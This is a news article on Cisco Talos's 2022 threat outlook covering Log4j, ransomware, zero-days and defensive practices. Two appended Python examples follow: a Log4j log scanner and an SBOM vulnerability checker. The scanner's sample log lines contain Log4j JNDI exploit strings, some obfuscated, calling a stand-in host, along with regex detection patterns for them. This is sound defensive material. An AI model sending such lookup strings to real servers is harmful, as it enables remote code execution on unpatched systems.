2022 will be another busy year for enterprise incident responders as ransomware, supply-chain and myriad zero-day attacks continue to rise, according to Cisco's Talos security experts.

To help address the threats, the Cisco Talos team used a blog and an online presentation to detail steps enterprises can take to defend themselves against the growing field of bad actors, and to point out lessons learned from recent damaging exploits such as the Log4j vulnerability and the Microsoft Exchange Server zero-days.

Once, zero-day attacks were typically launched by state actors against service providers, but those days are gone, wrote Nick Biasini, head of outreach at Cisco Talos, in a blog post about the security landscape in 2022. Now newer, less experienced combatants seek out a broader range of targets, using less surgical attacks. "This has led to more risky behavior than we've seen historically, without as much regard for collateral damage," he wrote.

State actors have changed their strategies as well. Rather than focusing on espionage against other nations, they now also target dissidents and activists with attacks designed to destroy and disrupt. At the same time, criminal enterprises have become a larger threat thanks to the billions of dollars they can readily collect through cryptocurrencies. "We've never faced more challenges as defenders..." Biasini stated.

Some of the biggest challenges for 2022 include ongoing problems such as Log4j and ransomware.

Unpatched Log4j remains a threat

Log4j is an open-source Java logging library embedded in a huge number of enterprise and consumer services, websites and applications. But it has weaknesses that, if exploited, could let unauthenticated remote attackers take control of affected servers and gain access to company information or launch denial-of-service attacks. In the most serious case an attacker only needs to get a crafted lookup string written to a log, for example through an HTTP header or form field, because vulnerable versions resolve such strings and can be made to fetch and run attacker-supplied code.

Cisco telemetry has detected attackers exploiting these weaknesses in vulnerable VMware Horizon servers and infecting them with malicious payloads including Cobalt Strike, a commercial adversary-simulation tool built for penetration testers and red teams that is also widely abused by attackers, said Neil Jenkins, Chief Analytic Officer at the Cyber Threat Alliance, in the online presentation with Cisco Talos. Even though there have been warnings to patch against Log4j, not everyone does, and "there are still threat actors, particularly advanced threat actors, who may look to target those vulnerabilities in future," he said.

Cisco Talos stated that Log4j will be widely exploited moving forward, so users should patch affected products and implement mitigations as soon as possible.

Ransomware still a scourge

With the exception of Q1, ransomware made up nearly 50% of all the threats that Talos tracked in 2021, thanks to the lure of lucrative payouts from victims. In turn, some of that cash will help ransomware cartels develop more sophisticated approaches. "As we saw with [supply-chain attack] Kaseya, these cartels have the ability to purchase or develop zero-days to be leveraged in attacks, a trend that should concern us all and another reason why behavioral protection will continue to be an important aspect of detection in 2022 and beyond," Biasini stated.

Another issue is that there are more and more ransomware players. At the beginning of 2021, many attacks came from one group, but by the end of the year there were at least 13 different ones, Jenkins said.

"Even with one family, you have a lot of different affiliates who are using different tactics, so even with one dominant family, you can still see a diversification in the types of attacks and the types of tooling they'll use," Jenkins said.

There are other factors that could change the ransomware landscape, the US government's anti-ransomware initiatives for one, as well as the scrutiny these groups are getting from law enforcement around the globe, Jenkins said. Larger ransomware groups might fragment to be less detectable, and open-source ransomware developers may have a more difficult time as some of their forums are shut down. As a result, attackers might choose smaller targets to avoid the publicity and law-enforcement attention that larger attacks draw, Jenkins said.

The best protection is to maintain cyber-defense best practices such as offline backups, multi-factor authentication and incident-response plans, Jenkins said.

Zero day is here to stay

There has been a dramatic increase in zero-day attacks, with more than 50 discovered in the wild during 2021, more than in all of 2019 and 2020 combined, Biasini stated.

And zero days remain a rich source of attacks. At the recent Tianfu Cup hacking contest in China, no fewer than 30 successful exploits were demonstrated against a short list of targets, including a handful that affected the latest versions of Windows and iOS. All of them were likely reported to the Chinese government due to recent regulatory changes, Biasini stated, which can have consequences. The most recent example is Alibaba being penalized by the Chinese government for not disclosing Log4j to it in advance, he stated.

Beware suspect USBs

Another interesting development has been the persistence of one of the oldest attack vectors in security: malicious USB devices.

"Starting in 2021, even carrying into this year, there has been an uptick of malicious USBs used as a means of initial access, which is a true blast from the past," Jenkins said. "But just a reminder that even these old, outdated attack vectors can still be used, and still have success."

Enterprise best practices

Cisco Talos researchers did have recommendations for enterprise incident response.

Patching, inventorying, segmentation, training and having incident-response plans in place are all important, but the Cisco experts have one main suggestion: institute multi-factor authentication. "We identified that a lack of MFA is probably one of the biggest hindrances to enterprise security," Jenkins said. "There is a large number of ransomware incidents that could have been avoided with MFA. So we absolutely encourage, wherever possible, and especially on sensitive systems, to institute MFA as soon as possible."

Some other ideas:

Keep accurate asset lists, current documentation and policies, especially those related to patching. These are fundamental when it comes to incident response. "The last thing you want is to be in the middle of an active incident to find out you don't have an accurate inventory of assets or that you haven't patched anything in six months. Ensuring fundamentals like network segmentation and proper access controls are implemented will limit the effects of a breach," Cisco stated.

Get software bills of materials (SBOMs) from vendors when considering software options. An SBOM lets you quickly determine whether a newly disclosed vulnerability in a specific library or open-source component affects what you run and how it could change daily operations, and it should allow a more thorough and thoughtful response.

Plan on the assumption that you will be breached at some point. Create a cybersecurity incident-response plan that includes all the stakeholders in the process. During an incident, every minute counts, so the appropriate departments must be ready to make decisions and take actions so containment can happen as soon as possible. Preparing and practicing your incident processes can make the difference between mitigating a compromised system and suffering a total breach.

Enable logging. This can be difficult and expensive, but it is crucial to have logging already in place when an incident happens; without it, you may never be able to determine the initial infection vector or patient zero. These failures can be catastrophic if multiple actors are able to abuse the same undiscovered weakness, Cisco stated.
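The logging recommendation and the Log4j section above meet in practice when responders go back through web-server logs looking for the lookup strings that were thrown at Log4j, which is how the initial infection vector is usually found. The Python script below is an added example, not code from the article, Cisco Talos or the Cyber Threat Alliance. It first collapses the nested-lookup obfuscation commonly seen in the wild (`${lower:...}`, `${upper:...}` and the `${...:-x}` default-value trick) and then flags any line that resolves to a `${jndi:...}` lookup, reporting the scheme it points at. The access-log lines and the 198.51.100.7 address are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache-style access-log lines for the example (not real telemetry).
# Line 2 carries a plain lookup string; lines 3 and 4 hide "jndi" behind nested
# lookups; line 5 contains a non-JNDI lookup that must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2022:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Jan/2022:12:00:03 +0000] '
    '"GET /?q=${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.7/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Jan/2022:12:00:04 +0000] "GET / HTTP/1.1" 200 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"',
    '10.0.0.12 - - [10/Jan/2022:12:00:05 +0000] "POST /api/${env:HOME} HTTP/1.1" 200 0',
]

# Innermost lookup: a ${...} whose body contains no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup and the scheme it points at (ldap, ldaps, rmi, dns, ...).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def resolve_lookup(body: str) -> Optional[str]:
    """Evaluate the obfuscation lookups attackers nest around 'jndi'.

    Returns the resolved text, or None when the lookup is not one we evaluate
    (including the jndi lookup itself, which must survive for detection).
    """
    # ${anything:-default} evaluates to the default; ${::-j} is the common form.
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, value = body.partition(":")
    if not sep:
        return None
    name = name.strip().lower()
    if name == "lower":
        return value.lower()
    if name == "upper":
        return value.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def repl(match: "re.Match[str]") -> str:
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line that resolves to a JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = JNDI.search(normalized)
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "obfuscated": normalized != line,
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        flag = " (obfuscated)" if hit["obfuscated"] else ""
        print(f"line {hit['line']}: jndi via {hit['scheme']}{flag}: {hit['normalized']}")
```

Normalizing before matching is the important step: a regex for the literal string `jndi` misses lines 3 and 4 entirely, while the resolved form exposes both the lookup and the callback scheme. The evaluator deliberately covers only the `lower`, `upper` and default-value lookups; other lookup types seen in the wild (for example `${date:...}` tricks) would need their own rule, and anything the script cannot resolve is left in place rather than guessed.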
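To make the SBOM recommendation above concrete, the Python below is an added example, not code from the article or from Cisco Talos. It assumes the vendor supplies a CycloneDX JSON SBOM (a common format; the document used here is constructed for the example) and that the advisory is expressed as an inclusive version range for a named component. It reports every component that falls inside the range and flags components whose version the SBOM omits, since those cannot be cleared without manual review. The advisory row used as input, log4j-core 2.0-beta9 through 2.14.1 for CVE-2021-44228, is the publicly documented affected range; confirm it against the vendor advisory before relying on it.

```python
import json
from typing import Dict, List, Tuple

# Constructed CycloneDX-style SBOM for the example (not a real vendor document).
# The fourth component deliberately lacks a version.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "version": "2.17.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
     "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core"},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
     "version": "2.12.3", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.12.3"}
  ]
}
"""

# Advisory rows: (advisory id, group, artifact, first affected, last affected), inclusive.
# The CVE-2021-44228 range is the publicly documented one; verify against the vendor advisory.
ADVISORIES: List[Tuple[str, str, str, str, str]] = [
    ("CVE-2021-44228", "org.apache.logging.log4j", "log4j-core", "2.0-beta9", "2.14.1"),
]


def version_key(version: str) -> Tuple:
    """Sortable key for Maven-style versions such as 2.14.1 or 2.0-beta9.

    Numeric segments compare numerically; a release sorts after any pre-release
    of the same number (2.0-beta9 < 2.0) because the flag is 0 for pre-releases
    and 1 for releases.
    """
    main, _, qualifier = version.partition("-")
    numbers = [int(part) for part in main.split(".") if part.isdigit()]
    numbers += [0] * (3 - len(numbers))
    release_flag = 0 if qualifier else 1
    return tuple(numbers) + (release_flag, qualifier.lower())


def in_range(version: str, low: str, high: str) -> bool:
    """True when version lies inside the inclusive [low, high] range."""
    return version_key(low) <= version_key(version) <= version_key(high)


def affected_components(sbom_json: str, advisories=ADVISORIES) -> List[Dict[str, str]]:
    """List SBOM components that fall inside an advisory's affected range.

    Components with no version cannot be cleared, so they are reported with
    status 'unknown-version' for manual review instead of being skipped.
    """
    sbom = json.loads(sbom_json)
    findings: List[Dict[str, str]] = []
    for component in sbom.get("components", []):
        group, name = component.get("group", ""), component.get("name", "")
        version = component.get("version")
        for advisory_id, adv_group, adv_name, low, high in advisories:
            if (group, name) != (adv_group, adv_name):
                continue
            if version is None:
                status = "unknown-version"
            elif in_range(version, low, high):
                status = "affected"
            else:
                continue
            findings.append({
                "advisory": advisory_id,
                "component": f"{group}:{name}",
                "version": version or "?",
                "status": status,
            })
    return findings


if __name__ == "__main__":
    for finding in affected_components(SBOM_JSON):
        print(f"{finding['status']:>15}  {finding['component']}@{finding['version']}"
              f"  ({finding['advisory']})")
```

Matching on group and artifact name rather than on the bare name matters here: `log4j-api` shares a version with the vulnerable `log4j-core` but is not in the advisory, and a name-only match would produce a false positive. The version comparison is deliberately simple (numeric segments plus a pre-release flag); for SBOMs that mix ecosystems with different version grammars, swap in a per-ecosystem comparator rather than stretching this one.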